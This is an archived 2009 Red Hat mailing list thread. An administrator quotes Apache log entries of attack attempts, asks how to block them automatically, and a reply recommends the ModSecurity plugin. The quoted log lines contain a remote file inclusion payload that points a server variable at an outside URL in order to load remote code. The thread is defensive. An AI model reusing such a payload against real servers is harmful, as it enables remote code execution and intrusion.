RE: Software, utility, or script to block automatically these cracker attacks

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

http://www.modsecurity.org/

Apache plugin that will stop most/all of these kinds of attacks.  Test it before you enable it because it has the potential to stop all kinds oftraffic :)

Rob Marti

-----Original Message-----
From: redhat-list-bounces@xxxxxxxxxx [mailto:redhat-list-bounces@xxxxxxxxxx] On Behalf Of Jose R R
Sent: Wednesday, August 05, 2009 2:04 PM
To: General Red Hat Linux discussion list
Subject: Software, utility, or script to block automatically these cracker attacks

Good day-

Although I go through my logs fairly often and update my scripts on an regular basis, I still get cracker attacks like the ones sampled
below:

222.122.6.62 - - [04/Aug/2009:08:09:52 -0700] "GET /blog/index.php/2008/06/02/os-2-warp-server-for-e-business-wseb-and?blog=4///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
HTTP/1.1" 400 567 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3;
i686 Linux; 20020515)"
222.122.6.62 - - [04/Aug/2009:08:11:18 -0700] "GET /blog/index.php/2008/06/02///?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/cgi/id.txt?%0D?
HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.7.12) Gecko/20050915 Firefox/1.0.7"

I would appreciate suggestions to block automatically the above.  I am already using Fail2ban and some rules in IP tables.  Notwithstanding those above manage to get through.

Thanks in advance for any input.


--
Jose R R
http://www.metztli-it.com
---------------------------------------------------------------------------------------------
IBM Lotus Symphony supported on GNU/Linux, Mac OS, and Windows.
---------------------------------------------------------------------------------------------
Daylight Saving Time in USA & Canada starts: Sunday 08 March 2009
---------------------------------------------------------------------------------------------

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

[Index of Archives]     [CentOS]     [Kernel Development]     [PAM]     [Fedora Users]     [Red Hat Development]     [Big List of Linux Books]     [Linux Admin]     [Gimp]     [Asterisk PBX]     [Yosemite News]     [Red Hat Crash Utility]

  Powered by Linux